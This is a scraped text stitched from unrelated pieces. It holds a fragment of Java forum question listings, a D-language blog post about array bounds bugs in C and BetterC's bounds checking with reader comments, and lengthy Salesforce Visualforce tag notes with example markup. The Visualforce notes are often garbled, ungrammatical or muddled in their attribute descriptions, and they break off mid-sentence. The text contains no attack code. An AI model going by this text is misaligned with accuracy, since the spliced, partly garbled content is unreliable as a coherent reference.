HTTP requests sent to a web server(database)? ... View Questions/Answers EJB JNDI LOOK UP PROBLEM March 31, 2010 at 12:53 PM Hi, I am using jboss4.2 and created a sessionbean<stateless> using EJB3 but while running client code I am finding NoInitialContextException claname not set in enviornment properties... Thankx. ... View Questions/Answers java March 31, 2010 at 12:28 PM just by removing the package name???? ... View Questions/Answers swings March 31, 2010 at 12:27 PM hi i want to fill a polygon with a pattern. for this i am trying to use the HSSFCellStyle.FINE_DOTS, but it gives a error like cannot find the variable HSSFCellStyle.how can i use the all hsscfill patterns give me a small example for this.......... ... View Questions/Answers
http://www.roseindia.net/answers/questions/232
CC-MAIN-2017-09
refinedweb
4,620
62.48
. This post is the second in a series about D’s BetterC mode. Do you ever get tired of bugs that are easy to make, hard to check for, often don’t show up in testing, and blast your kingdom once they are widely deployed? They cost you time and money again and again. If you were only a better programmer, these things wouldn’t happen, right? Maybe it’s not you at all. I’ll show how these bugs are not your fault – they’re the tools’ fault, and by improving the tools you’ll never have your kingdom blasted by them again. And you won’t have to compromise, either. Array Overflow Consider this conventional program to calculate the sum of an array: #include <stdio.h> #define MAX 10 int sumArray(int* p) { int sum = 0; int i; for (i = 0; i <= MAX; ++i) sum += p[i]; return sum; } int main() { static int values[MAX] = { 7,10,58,62,93,100,8,17,77,17 }; printf("sum = %d\n", sumArray(values)); return 0; } The program should print: sum = 449 And indeed it does, on my Ubuntu Linux system, with both gcc and clang and -Wall. I’m sure you already know what the bug is: for (i = 0; i <= MAX; ++i) ^^ This is the classic “fencepost problem”. It goes through the loop 11 times instead of 10. It should properly be: for (i = 0; i < MAX; ++i) Note that even with the bug, the program still produced the correct result! On my system, anyway. So I wouldn’t have detected it. On the customer’s system, well, then it mysteriously fails, and I have a remote heisenbug. I’m already tensing up anticipating the time and money this is going to cost me. It’s such a rotten bug that over the years I have reprogrammed my brain to: - Never, ever use “inclusive” upper bounds. - Never, ever use <=in a for loop condition. By making myself a better programmer, I have solved the problem! Or have I? Not really. Let’s look again at the code from the perspective of the poor schlub who has to review it. He wants to ensure that sumArray() is correct. He must: - Look at all callers of sumArray()to see what kind of pointer is being passed. - Verify that the pointer actually is pointing to an array. - Verify that the size of the array is indeed MAX. While this is trivial for the trivial program as presented here, it doesn’t really scale as the program complexity goes up. The more callers there are of sumArray, and the more indirect the data structures being passed to sumArray, the harder it is to do what amounts to data flow analysis in your head to ensure it is correct. Even if you get it right, are you sure? What about when someone else checks in a change, is it still right? Do you want to do that analysis again? I’m sure you have better things to do. This is a tooling problem. The fundamental issue with this particular problem is that a C array decays to a pointer when it’s an argument to a function, even if the function parameter is declared to be an array. There’s just no escaping it. There’s no detecting it, either. (At least gcc and clang don’t detect it, maybe someone has developed an analyzer that does). And so the tool to fix it is D as a BetterC compiler. D has the notion of a dynamic array, which is simply a fat pointer, that is laid out like: struct DynamicArray { T* ptr; size_t length; } It’s declared like: int[] a; and with that the example becomes: import core.stdc.stdio; extern (C): // use C ABI for declarations enum MAX = 10; int sumArray(int[] a) { int sum = 0; for (int i = 0; i <= MAX; ++i) sum += a[i]; return sum; } int main() { __gshared int[MAX] values = [ 7,10,58,62,93,100,8,17,77,17 ]; printf("sum = %d\n", sumArray(values)); return 0; } Compiling: dmd -betterC sum.d Running: ./sum Assertion failure: 'array overflow' on line 11 in file 'sum.d' That’s more like it. Replacing the <= with < we get: ./sum sum = 449 What’s happening is the dynamic array a is carrying its dimension along with it and the compiler inserts an array bounds overflow check. But wait, there’s more. There’s that pesky MAX thing. Since the a is carrying its dimension, that can be used instead: for (int i = 0; i < a.length; ++i) This is such a common idiom, D has special syntax for it: foreach (value; a) sum += value; The whole function sumArray() now looks like: int sumArray(int[] a) { int sum = 0; foreach (value; a) sum += value; return sum; } and now sumArray() can be reviewed in isolation from the rest of the program. You can get more done in less time with more reliability, and so can justify getting a pay raise. Or at least you won’t have to come in on weekends on an emergency call to fix the bug. “Objection!” you say. “Passing a to sumArray() requires two pushes to the stack, and passing p is only one. You said no compromise, but I’m losing speed here.” Indeed you are, in cases where MAX is a manifest constant, and not itself passed to the function, as in: int sumArray(int *p, size_t length); But let’s get back to “no compromise.” D allows parameters to be passed by reference, and that includes arrays of fixed length. So: int sumArray(ref int[MAX] a) { int sum = 0; foreach (value; a) sum += value; return sum; } What happens here is that a, being a ref parameter, is at runtime a mere pointer. It is typed, though, to be a pointer to an array of MAX elements, and so the accesses can be array bounds checked. You don’t need to go checking the callers, as the compiler’s type system will verify that, indeed, correctly sized arrays are being passed. “Objection!” you say. “D supports pointers. Can’t I just write it the original way? What’s to stop that from happening? I thought you said this was a mechanical guarantee!” Yes, you can write the code as: import core.stdc.stdio; extern (C): // use C ABI for declarations enum MAX = 10; int sumArray(int* p) { int sum = 0; for (int i = 0; i <= MAX; ++i) sum += p[i]; return sum; } int main() { __gshared int[MAX] values = [ 7,10,58,62,93,100,8,17,77,17 ]; printf("sum = %d\n", sumArray(&values[0])); return 0; } It will compile without complaint, and the awful bug will still be there. Though this time I get: sum = 39479 which looks suspicious, but it could have just as easily printed 449 and I’d be none the wiser. How can this be guaranteed not to happen? By adding the attribute @safe to the code: import core.stdc.stdio; extern (C): // use C ABI for declarations enum MAX = 10; @safe int sumArray(int* p) { int sum = 0; for (int i = 0; i <= MAX; ++i) sum += p[i]; return sum; } int main() { __gshared int[MAX] values = [ 7,10,58,62,93,100,8,17,77,17 ]; printf("sum = %d\n", sumArray(&values[0])); return 0; } Compiling it gives: sum.d(10): Error: safe function 'sum.sumArray' cannot index pointer 'p' Granted, a code review will need to include a grep to ensure @safe is being used, but that’s about it. In summary, this bug is vanquished by preventing an array from decaying to a pointer when passed as an argument, and is vanquished forever by disallowing indirections after arithmetic is performed on a pointer. I’m sure a rare few of you have never been blasted by buffer overflow errors. Stay tuned for the next installment in this series. Maybe your moat got breached by the next bug! (Or maybe your tool doesn’t even have a moat.) 4 thoughts on “Vanquish Forever These Bugs That Blasted Your Kingdom” Is there any significant reason why __gshared is being used when initializing “values” in your example? Regardless, I’m looking forward to future entries in this series! I don’t get it. Where have all the goto’s gone? From Reddit [1]: > static declarations are put in TLS (thread local storage). [1] Reminds me of a bug I ran into recently while using the dmd lexer in a project. When I passed any valid file to the lexer it worked fine. When I passed a batch of valid files to the lexer, after a few files were processed, it started to spit out all kinds of errors about invalid Unicode code-points and ghost tokens. All those locations were past EOF. When I passed in that particular file individually it worked like a charm. When I over-sized the buffer that held a file by one char and set that to 0 it worked for the batch of files.
https://dlang.org/blog/2018/02/07/vanquish-forever-these-bugs-that-blasted-your-kingdom/
CC-MAIN-2018-43
refinedweb
1,510
71.65
Code Documentation Standards Starting from version 4 CKEditor uses a customized version of JSDuck as code documentation generator; previously JSDoc was used. JSDuck’s comment format differs from JSDoc’s and both generators have different feature lists. Thus, with CKEditor 4 release, the entire source code documentation was reformatted in a new, consistent way. The resulting CKEditor API documentation is always available at. # Useful Links - CKEditor JSDuck customization - JSDuck GitHub page - JSDuck Wiki - Tags list - Markdown format - basics - CKEditor API documentation # JSDuck vs JSDoc — Important Differences - JSDuck supports Markdown. HTML entities may still be used, but try to avoid them in favor of Markdown. Note that HTML in code samples and pre-formattedwill be encoded. - JSDuck does not accept the following tags: @namespace, @name, @constant, @augments, @field, @type(deprecated), @defaultand more (only those that CKEditor 3 was using are listed). - JSDuck accepts some new tags: @cfg, @member, @chainable, @inherits, @method, @mixins, @readonly, @singleton, and more. - Some common tags have different format in JSDuck (e.g. @examplecreates live examples, standard code samples are just indented). - JSDuck does not parse code searching for classes and properties. It will therefore only find those API elements which have at least their preceding /** */doc comments. - JSDuck recognizes API element names (methods, classes, events, configuration variables, properties, etc.), method definitions (with argument lists), and properties (their type and default value, too, if possible). Thus, in some cases this information does not have to be specified. - Classes’ definitions can be opened multiple times — it is useful when class methods and properties are defined in more than one file or place in the code. - There is no list of files in JSDuck, so old @licenseand @fileOverviewtags are kept for other purposes (and thanks to custom tags they work in JSDuck like @ignore). - There are no namespaces in JSDuck, so the packages tree is auto-generated based on the classes tree and @membertags. - All properties, events, etc. defined under the class definition will be assigned to this class, so there is no need to specify @member. # Documentation Formats # File Header The @license and @fileOverview tags are legacy comments that will not be parsed by JSDuck. /** * @license Copyright (c) 2003-2019, CKSource - Frederico Knabben. All rights reserved. * For licensing, see LICENSE.md or */ /** * @fileOverview Defines the {@linkapi CKEDITOR.editor} class that represents an * editor instance. */ Note: Since @fileOverview comments are ignored, they have not been reformatted, so they may still contain the old JSDoc format. # Class This is an example of a class definition. It contains so many tags to show their correct order. /** * Represents an editor instance. This constructor should be rarely * used, in favor of the {@linkapi CKEDITOR} editor creation functions. * * ```js * var editor = new {@linkapi CKEDITOR.editor}(); * editor.setSomething( name, { * value: 1 * } ); * ``` * * @since 3.0 * @private * @class {@linkapi CKEDITOR.editor} * @extends {@linkapi CKEDITOR.parent} * @mixins {@linkapi CKEDITOR.event} * @mixins {@linkapi CKEDITOR.whatever} * @constructor Creates an editor class instance. * @param {Object} [instanceConfig] Configuration values for this specific instance. * @param {Number} [mode={@linkapi CKEDITOR.SOURCE_MODE}] The element creation mode to be used by this editor. * * Possible values are: * * * {@linkapi CKEDITOR.SOURCE_MODE} - description 1, * * {@linkapi CKEDITOR.WYSIWYG_MODE} - description 2 long long long * long long long long long, * * CKEDITOR.ANOTHER_MODE - description 3. * * @param {CKEDITOR.dom.element} [element] The DOM element upon which this editor * will be created. */ CKEDITOR.editor = function( ) { // ... A minimal class documentation: /** * Represents an editor instance. This constructor should be rarely * used, in favor of the {@linkapi CKEDITOR} editor creation functions. * * @class */ CKEDITOR.editor = function() { // ... When you want to reopen the class declaration in another file, use this: /** @class {@linkapi CKEDITOR.editor} */ # Details The order of tags may look strange, but you can remember it thanks to the following description: Since 3.0 there is a private class CKEDITOR.editorwhich extends CKEDITOR.parentand mixins CKEDITOR.eventand CKEDITOR.whatever. It has a private constructor (switched order — explained later in the tags list) which accepts the following parameters: … Important tag details: By default private classes will not be visible in the packages tree. A good example of the difference between “mixins” and “extends” is that eventis mixed in various other classes and the CKEDITOR.dom.*structure is based on extending parent classes. A constructor is in fact a separate documentation “instance”, because it will be listed with methods. Thus, it may have its own @private, but it has to be placed below it, because everything before will be a part of the class description. However, two @privatetags in one comment will not be accepted by JSLinter, so in this case the documentation should be split into two comments. A constructor can also be declared completely independently from the class, which is useful when CKEDITOR.tools.createClass has been used. # Property and Configuration Variable The following is an example of property documentation. /** * A unique identifier of this editor instance. * * **Note:** It will be originated from the ID or the name * attribute of the `element`, otherwise a name pattern of * 'editor{n}' will be used. * * @private * @readonly * @static * @property {String/Boolean} [complicatedName=default value] * @member {@linkapi CKEDITOR.editor} */ obj[ 'complicated' + 'Name' ] = this.name || genEditorName(); A minimal property documentation: /** * Property description (even this may be omitted, but it is better to always describe a property). */ this.propertyName = 'value'; Which will be recognized as @property {String} [propertyName='value'] by JSDuck and will be assigned to the class defined earlier in the file. Partial: /** * Property description. * * @property {String} [=config.something (value taken from configuration)] */ this.propertyName = this.config.something; Basic: /** * Property description. * * @property propertyName */ this.propertyName = this.config.something; # Details - JSDuck type definitions are awesome — read more about them. - Property names, types, and default values may be recognized automatically. - The default value does not have to be JavaScript code, so in the “Partial” example JSDuck will print: “Defaults to: config.something (value taken from configuration)”. - If a property is not defined below a class definition or if it belongs to a different class, then @memberhas to be used. Specifying a namespace in @propertyis not possible. # Configuration Variables To define a configuration variable instead of a property: - Use @cfginstead of @property. The format is the same. @private, @readonly, @staticmay not work (have not been tested). # Method and Event The following is an example of method documentation. /** * The {@linkapi CKEDITOR.dom.element} representing an element. If the * element is a native DOM element, it will be transformed into a valid * {@linkapi CKEDITOR.dom.element} object. * * ```js * var element = new {@linkapi CKEDITOR.dom.element}( 'span' ); * alert( element == {@linkapi CKEDITOR.dom.element.get}( element ) ); // true * * var element = document.getElementById( 'myElement' ); * alert( {@linkapi CKEDITOR.dom.element.get}( element ).getName() ); // (e.g.) 'p' * ``` * * @private * @static * @method complicatedName * @member {@linkapi CKEDITOR.editor} * @param {String/Object} element Element's ID or name or a native DOM element. * @param {Function} fn Callback. * @param {String} fn.firstArg Callback's first argument. * @param {Number} fn.secondArg Callback's second argument. * @param {String} [name='default value'] * @returns {CKEDITOR.dom.element} The transformed element. */ this[ 'complicated' + 'Name' ] = (function() { return function() { }; }()); Typical: /** * Method description. * * @param {String/Object} element Element's ID or name or a native DOM element. * @param {String} [name='default value'] * @returns {CKEDITOR.dom.element} The transformed element. */ this.methodName = function() { // ... }; # Details - The @methodtag has to be used when it is not clear that a piece of code is a method (e.g. a closure returning a function was used or a reference to a function defined elsewhere) or when the method’s name is not obvious. - Callback arguments may be defined. Also, if a method returns an object, its properties may be defined too — read more. - Both @returnand @returnsare accepted, but use the latter one. # Events To define an event instead of a method: - Use @eventinstead of @method— usually you will have to provide a name. @returnsis not accepted. # Miscellaneous Rules - Always leave one blank line between the textual comment and the first tag. - Separate all blocks (paragraphs, code samples, etc.) with one blank line. - Code samples are wrapped with triple back ticks ```, optionally followed with a language identifier — no spaces are to be used. - Always place a dot ( .) at the end of a sentence. A sentence starts with an upper-case letter. - Always use single quotes for JavaScript strings, but double quotes for cites, irony, etc. in textual comments. - Cross-reference format for links is: CKEDITOR.name.space#property. If there is more than one event/property/configuration/method with the same name, then prepend cfg-, property-, method-or event-to the name. The namespace may be omitted if it equals to @memberor the current class. See the “Cross-references” section in the JSDuck’s guide. - Use real format in default values: CKEDITOR.name.space.property. - When describing the value returned or alerted in the code sample, wrap only strings in ''. All other types (Boolean, numbers, objects, etc.) should be left unwrapped. - There is no Integer type in JavaScript and constructors’ names should be used as types names — so Boolean, not boolean. - In textual comments wrap tokens, names from code, JavaScript values, etc. with ``for better visibility. Remember to wrap strings with ''— so: This method may return: `‘text text’`.
https://ckeditor.com/docs/ckeditor4/latest/guide/dev_code_documentation.html
CC-MAIN-2019-39
refinedweb
1,503
52.15
Tags used to Create VISUALFORCE Pages Tags used to Create VISUALFORCE Pages 1). <Apex:Page>: This is a very important tag of a VF. This says that a single VF page and all the components must be wrapped inside this single page. Attributes of <apex: page> tag are: - Action: This invokes when this page is requested by the server, here we must use a expression language to reference an action method in APEX Action= {! do action} ---> Must be defined in APEX class. EX:- action= {! int} or action= {!redir} ---> re directions the page to new page referred ---> Initializes - Controller: It’s a string type and the name given here must be implemented in an Apex class, controller means an custom controller, this cannot be used if we use standard controller. <apex: page - Extension: This is used to extend the custom controllers we can have any extension for an custom controller, this is used to add extra functionality. <apex: page controller: “string" extension="string"> - ID: It’s a string, gives an identification for tag, we can specify any name, but it should not be a duplicate, it’s generally used to refer this page by other components in the page. - Record setvar: it’s a string; this attribute indicates that the page users a set of records oriented by a standard controller only. Used to handle multiple records, this attribute converts a controller to a list controller. - Render As: it’s a string the name of any supported content converter, we can change the display in to a 'PDF' or another type currently it’s only a 'PDF' format. <apex: page render displays a page in a pdf format - Renderd: it's a Boolean type, related to the displaying of a page by default it’s a 'TRUE', if we keep it false the page will not be displayed. - Setup: it's a Boolean type; it specifies whether the page should implement standard salesforce.com setup if its true.It will not implement by default if its "FALSE" - Show header: it's a Boolean type, displays or hides the salesforce header if true or false respectively. - Sidebar: it's a Boolean type, displays or hides the sidebar of standard salesforce site. - standard controller: it's the sales force object that's used to control the behaviour of this page, this attribute cannot be specified if custom controller is used. <apex: page standard - Standard style sheets: it's a Boolean type; it decides whether the standard salesforce style sheets are added to the generated page header if the showheader attribute is set false, if it’s set true the standard style sheets are by default, added to the generated page header. The other important tags are tab style title, help URL & help title. 2).Apex.form: 2).Apex.form: A section of a VF page that allows users to enter o/p and then submit it with an <apex: command Button> or <apex :command link> The body of the form determines the data that is displayed and the way it is processed. Attributes of this tag are: - Accept:it's a string type, the text to display as a tooltip when the user's mouse pointer hovers over this component. - Accept charset: Its a string type, it’s a comma separated list of characters encoding that a server processing this form can handle. - Dir: it’s a string type, it specifies the directions such as RTL & LTR (Right to left or left to right), that should display the components in the form of a VF page(position). Onclick, anddblclick, onkeydown, on keypress, onkeyup, onmousedown, onmouseout, onmousemove, onmouseup, onreset, onsubmit These are the general attributes must be used within the form tag, all related when we use JAVASCRIPT in our design, when this JAVASCRIPT should be invoked either on one click, double click, onkeydown, press, up, down, move.............. On-reset and on submit are important, here the JavaScript is invoked when an event such as reset/submit occurs, if the user clicks on reset/submit buttons. 3).<apex:pageblock>: it's an area of a page that uses styles similar to the appearance of a salesforce detail page, without any default content. In detail page we can see only the components in 2 column's here we can make it to any number of columns using page Block section. And we can create instances rather than full names of objects i.e. <apex:pageblock </apex:pageBlock> Attributes are: - Dir:Direction of display 'RTL/LTR' - helptitle: it's a string type, the text in title will be displayed when a user hovers the mouse over the help link for the pageblock. We must use this in relation with helpURL helpURL it's a string type, the URL of a webpage that provides help for the page block. Here also we can perform the same actions which can be performed using the form tag, the Java script enabled tag attributes are like the following. Onclick, onclick, onkeydown, onkeypress, onkeyup........... 4).<apex.facetname>: This is an tag which is used to mention the column name of the column and this will overrides the attributer properties of the <apex:pageblock> section like JavaScript enabled attributes, title, help text, help URL,....... And the column component can be added in both ways i.es the header and footer. - footer: The components that appear at the bottom of the page block. - Header: The components that appear as a header of the page block. 5).apex:PageBlock section This tag can be used to create sections within a page block to categorize different fields into different sections. It’s similar to adding a section by using a edit page layout assignment. These sections spans of two cells. One for the field label, and another for its value. Each component found in the body of an <apex: pageblock section> is placed into the next cell in a row until the no. of columns is reached. To add fields, and objects to this <apex: pageblock section> we use <apex:inputfield> or <apex:outputfield> component each of these component automatically displays with the field's associated label. Attributes - Clooapsible: it's a Boolean type, it specifies whether the page block section can be expanded and collapsed by a user, by default its "TRUE" - Columns: it's an integer type, it specifies the no. of columns that can be included in a single row of a pageblock section, a single column can span two cells-one for field label, and another for its value. - Dir: Direction RTL or LTR - Showhader:It's a Boolean type variable, value that specifies whether the page block section title is displayed, if it's true. 6). apex:pageblocksection item A single piece of data in an <apex: pageblocksection> that takes keep up one column in one row. An <apex:pageBlocksection Item> component can include up to two child components, If no content is specified, the content spans both cells of the column. If two child components are specified , the content of the first is rendered in left, "label" cells of the column, while the content of the second is rendered in the right , "data' cell of the column. EX:- if we include an <apex:outputfield> or an <apex:inputfield>component in an <apex:pageblockitem>, these components do not display with their label or custom help text as they do when they are children of an <apex:pageblockitem> And these components cannot be rendered, rerender the child components instead. Attributes : (DIr, helptext,ID) - Labelstyle: Its a string type, these style used to display the content of the left “label" cell of the page block section column and uses all JavaScript enabled tags (discussed above) 7). <Apex:pageblock buttons>: A set of buttons that are styled like standard salesforce buttons the component must be a child component of an <apex: pageblock> This tag creates buttons and places them in the page block title area and footer area. Here we can specify the location of the button's in a section it can be either "Top/Bottom" Attributtes: Dir, Location: it's the area of the page block where the buttons should be rendered.Possible values are "top/bottom" or "both". This can be overridden when we use facet (header/footer) By default it's set to both. 8).apex:command button: A button that is rendered as an HTML o/p element with the type attribute set to "submit" , "rest" or "image" depending on the <apex: command button> tags specified values The button executes an action the child of an <apex: form> component EX:<apex:commandbutton Attributes: - Accesskey: it's a string type, it's a keyboard accesskey that puts the command button in focus. action: Apex page. Action this can be invoked by AJAX request to the server uses merger-field syntax to reference the method. Action="{! save}" references save method written in controller. If action is not specified, the page simply refreshes. - Dir:ID:Disabled - images: it's a string type, the absolute or relative URL of image displayed as this button, if specified; the type of the generated HTML input element is set to "image" Supports all Java script enabled attributes. - Rerender: its Boolean type, value that specifies whether the component is rendered on the page. If not specified, by default its true. - Timeout: it’s an integer type, the amount of time (in milliseconds) before an AJAX update request should time out. - Value:it’s an object type, text displayed on the Command Button as its label. 9). <apex: message>: This tag can be used to display custom error messages on a VF page. If this is not mentioned then the errors can be displayed only in debug log; 10). <apex:messages>: All messages that were generated for all components on the current page.(standard salesforce style error messages) Default name is "error" 11).<apex:pagemessage>: This component should be used for presenting custom messages in the page using the salesforce pattern for errors, warnings and other type of messages for a given severity. Attributes are: - Detail:it's a string type, the detailed description of the errors information. - Severity:it's a string type, values supported by this are ‘confirm’, 'info', warning', 'error'.We can display the severity of the error messages generated. - Strength:it's an integer type, it’s the strength of the message, this controls the visibility and size of icon displayed next to the message. Use 0 for no image, or 1-3 (highest strength, largest icon) - Summary: it's a string type, the summary message. 12).<apex:page messages>: This component displays all messages that were generated for all components on the current page, presented using the SF styling. Attributes: - Escape:its Boolean type, A Boolean value whether, sensitive HTML, and XML characters should be escaped in the HTML old generated by this component. - show details:It's a Boolean type, specifies whether it displays the detail position of the messages, by default its false. 13).<Apex:Detail> This is a self sustained tag, this is a very powerful tag, this displays details page of a particular object. This component includes attributes for including or excluding the associated related lists, related lists hover links, and title bar that appear in the standard SF API. Attributes - Inline Edit: It's a Boolean type, controls whether the component supports inline editing or not - Related list: It's Boolean type, which specifies whether the related lists are included in the rendered component. - Related list Hover: It's a Boolean type that specifies whether the related list hover links are included in the rendered component. Enable Related List Hover Links: Selected under setup/Customize /user interface. - ID: It's a string type, indentifies that allows the detail component to be referenced by other component in the page. - Rendered: It's a Boolean value that specifies whether the component is rendered on the page, by default its true. - Render: It's an object type, the ID of one or more components that redrawn when the result of an AJAX updates requested returns to the client. ***This will only works if inline Edit or show chatter are set to true. 14).<Apex:panel Bar>: This tag creates a panel bar on a VF page which can accommodate multiple panels. ***This can include up to 1, 0000 >apex: panel Bar Item> tags. This tag creates a pannel bar on a VF page which can accommodate multiple panels. Attributes: - Height: It's a string type, the height of the pannel bar when expanded, expressed either as a percentage of the available vertical space height="50" or height "200 px"s - Switch type: It's a string type, the implementation method for switching between Pannel Bar Items. The possible values include; "client", "server" and ajax . The value; it's an object type the ID of the Pannel Bar is displayed. - Var: It's a string type, the name of the variable that represents one element in the collection of data specified by the item attribute. We can then use this variable to display the element. Itself in the body of the Pannel Bar. Component tag. - Width: Controls the width of the pannel bar, expressed either in percentages of the available horizontal space or as a number of pixels. If not specified default is ="100%". 15). <apex:pannel baritem>: It's a section of <apex: Pannel Bar > That can expand or retract when a user clicks the section header, when expanded the header and the content of the <apex: Panel Bar Item> is displayed, when retracted, only the header of the <apex: Panel Bar Item> displays. Attributes - Expanded: It's a Boolean type, that specifies whether the content of this : Panel Bar Item is displayed. - Labelstyle : It's a string type, the text displayed as the header of the Panel Bar Item component. - Onenter: It's a string type, JavaScript invoked when the Panel Bar Item is not selected and the user clicks on the component to select it. - Onleave: It's a string type, JavaScript invoked when the user selects a different Panel Bar Item. 16).< Apex:TabPanel>: A page area that displays as a set of tabs. When is a user clicks a tab header, the tabs associated content displays binding the content of others tabs. Creates a Panel, which can accommodate multiple tabs. Attributes are Active tab Classes It's a string type its a style classes used to display a tab header in the tab panel when it is selected, used primarily to designate, which css styles are applied when using an external css style sheet. An HTML style name which controls the look and feel of the tab that is currently selected. Inactive Tab Class : Controls the look and feel of inactive tabs. Selected Tab: Name of the tab that should be first selected on displayed to the user when the page is first open . it will be the default tab when the page loads. Header Alignment: Left/Right. And we can adjust the spacing b/w tabs through header spacing. 17).<Apex:Tab>: This component must be a child of an <apex: tab panel> Attributes are: - id: It's a string type, an identifier that allows the tab component to be referenced by other component in the page. - Immediate: It's a Boolean type, specifies whether the action associated with this component happen's immediately, without processing any validation rules associated with the fields on the page. If set to true, the action happen's immediately and validation rules are skipped, by default it's false. and support s all Java enabled tags such as onclick, on doubleclicks.... Desired to gain proficiency on Salesforce? Explore the blog post on Salesforce training and certification to become a pro in Salesforce. Output Tags: 18) <Apex: Output field 19) <Apex: Output label 20) <Apex: Output label 21) <Apex: Output text <Apex: Output link> To displays views: 22) <Apex: List view 23) <Apex: enhanced list 24) < Apex: Sectioned header>: A tittle bar for a page. In a standard salesforce.com page the title bar is a colored header displayed directly under. Attributes are : the tab bar. - Description: It's a string type, description text for the page that displays just under the colored title bar. - Printer: It's a string type, the URL is printable view. - Subtitle: The text displayed just under the main title in the colored title bar. 25). <apex: Selected Checkboxes> These are elements, displayed in a table. Attributes are - access key: It's a string type, the keyboard access key that puts check boxes component in focus. - layout: It's a string type, the method for which check boxes should be displayed in the table value Possible values are: "Lines direction". Check boxes are horizontal "page direction" placed vertically. By default its value is "line direction" 26). <apex:selectlist>: A list of options that allows users to select only one value or multiple values at a time, depending on the value of its multiselect attribute. Attributes are: - Multiselect: It's a Boolean type, specifies whether the user's can select only one or more items from a list. - tabindes:It's a string type, the order in which this select list component is selected compared to other page components when a user presses the tab key repeatedly. The value is an integer from 0-32767. 27). <apex:select option> The values are provided from <apex: selected checkboxes > or <apex: Select List> or <apex : select radio> component. It must be a child of one of the above component. The no. of checkboxes/Radio buttons/List values that are declared in logic (method apex) in the controller part. ---> Uses attributes discussed above. 29). <apex:selection>:same as <apex:selection> Only we have 3 attributes: id, render, value 30). <apex:select radion> A set of related radio button input elements, displayed in a table, unlike checkboxes, only one radio button can ever be selected at a time. Tags used to invoke Java script using AJAX request (A synchronous Java script and XML). And the tags are 1).<apex:action function> A component that provides support for invoking controller action method directly from JavaScript code using an AJAX request. An <apex: action function> it must be a child of <apex: from>. difference: <apex: action support>, supports invoking controllers action method from other VF components. (referenced by other components) <apex: action function> defines New JavaScript function which can then be called from within a block of JavaScript code. (within JavaScript )>. Attributes are - Action: This is Apex Pages. Action, type, the action method invoked when the action Function is called by a JavaScript event elsewhere in the page markup. We use merge field syntax to reference the method. If an action is not specified, the page simply refreshes. - Name: It's a string type, the name of the JavaScript function, that when invoked yes, elsewhere in the page Markup, causes the method specified by the action attribute to execute. When the action method components specified by the rerender attributes will be refreshed. - Render: It's an object type, the ID of one or more components that are redrawn when the result of the action method returns to the client. - Status:The component which are redrawn when-separated lists of ID's, or a merge filed expression for a list or collection of ID's (These are displayed after the execution of the method). Render --->before execution Render ---> after execution} à component displayed [1] It's a string, the ID of an associated component that displays the status of an AJAX: update request. Timeout: It’s an integer type, the amount of time (in milliseconds) before an AJAX update request should time out. Immediate A Boolean value that specifies whether the action associated with this component should happen immediately, w/o passing any validation rule associated with the fields on the page, if set to true. (Validations are skipped) by default its false. OnceComplete:It’s a string type, this provides us with a name of the JavaScript file invoked when an event occurs. When AJAX request is processed. 2).<apex:action poller> It does a partial page refreshment based on time interval. The times sends an AJAX update request to the server according to a time interval that we specified. (don't use this with enhanced listing) <apex :action poller> is ever re-rendered as the request of another action, it resets itself. It should be within the <apex: action region>. Attributes are - Action: ApexPage. Action, invoked by the periodic AJAX update request from the component, can use merge field syntax to reference a method. - Action: "{!increment counter}" reference the incrementcounter () method in the controller. If action is not mentioned the page simply refreshes. - Interval: Time interval between AJAX update request, in seconds here the updation can be done for multiple fields at a time. This can be written in action logic. 3).<Apex:action region> This tag helps us to create a set of components which can be displayed whenever some Ajax up date is performed on a VF page. An area of a VF page that demonstrates which components should be processed by the Force.com server. Only the components inside <apex: action region> are processed by the server during an AJAX request. But it doesn't define the area (s) of the pages (s),( rendered) when the request completes . To controls the behavior, use the rerender attribute on an <apex: action support> <Apex: action Poller > <Apex: Command Button> <apex: Command Link> <apex: tab <apex: tab Pannel>. Attributes are ID: It's a string type, it indentifies that allows the component to be referenced by other component in the page. Render region only It's a Boolean type, a Boolean value that specifies whether AJAXinvoked behaviour outside of the action region should be displayed when the action region is processed, if true. By default it’s set to TRUE 4).<apex:Status Action>: A component that displays the status of AJAX update request. An AJAX request can either be in progress or complete. Message can be anything like inserting, updating completed, done -----etc. Attributes: It's a string type, the status text displayed at the start if AJAX request. the message to be displayed once the action is invoked or before the action is completed. - for:This is a string type, the ID of an action region component for which the status indicator is displaying status. - id:allows the action status components to be referenced by other components in the page. - Stop Text:The status text displayed when an AJAX request completes. 5).<apex:action support>: A component that adds AJAX support to another component, allowing the component to be refreshed asynchronously by the server when a particular event occurs, such as button click or mouse over. Attributes are: (creates a set of components displayed whenever some update is performed on VF pages). - event:It's a string type, this is an JavaScript event that generates the AJAX request possible values are ("on blur", on change", "on click", "on bl click", "on focus", "on key down", "on key press'---------) - focus:The id of the component that is in focus after the AJAX request completes. - status:It's a string type, the ID of an associated component. That displays the status if AJAX update request. Visual force scenarios: Visual force Page Scenario 1: Create the Visualforce page called “Opportunity View”with the following code and override with the “New” button on Opportunity Object.Result would be like once we click on the Opportunity tab and click on “New” button <apex: <apex:form> <apex:pageBlock <apex:pageBlockButtons> <apex:commandButton </apex:pageBlockButtons> <apex:pageBlockSection <apex:inputField <apex:inputField <apex:inputField <apex:inputField <apex:inputField </apex:pageBlockSection> <apex:pageBlockSection <apex:inputField <apex:inputField <apex:inputField <apex: <apex:inputField </apex:pageBlockSection> </apex:pageBlock> </apex:form> </apex:page> Now click on the Opportunity tab and click on “New” button Visualforce Page Scenario 2: Write a visualforcepage to view the Account Related list as Tabs <apex: <style> activeTab {background-color: #236FBD; color:white;background-image:none} inactiveTab { background-color: lightgrey; color:black;background-image:none}</style> <apex: <apex:tab <apex: </apex:tab> <apex: <apex:relatedList </apex:tab> <apex: <apex:relatedList </apex:tab> <apex: <apex:relatedList </apex:tab> <apex:tab <apex:relatedList </apex:tab> </apex:tabPanel> </apex:page> Create the button called “Tabbed Account” on the Account object. While creating button, select “OnClick Java Script” as the Content Source and write the following code parent.window.location.replace ("/apex/RelatedListAsTabsDisplay?id={!Account.Id}"); Note: RelatedListAsTabsDisplay --> Visualforce Page Nam> Once we click on “Tabbed Button”, we will get the following screen. - Click on Details tab -->to open Detail page - Click on Contacts tab -->tto open the Contacts related list and same for Opportunities, Open Activities and Notes and Attachments Explanation: In the 1st step starts with pagetag, here it includes standardController=”ACCOUNT”, and the header will be enabled, and tab style will be of account. - <Style> is used to include STYLE SHEETS, here we used them to disply the ACTIVE AND INACTIVE tabs. ACTIVE is: BLUE COLRED And INACTIVE: Grey in color. - We are taking a tab panel which consists of all the tabs of account - SwitchType: The implementation method for switching between tabs specifies the general operation is between CLIENT and Server. - SELECTED TAB:The name 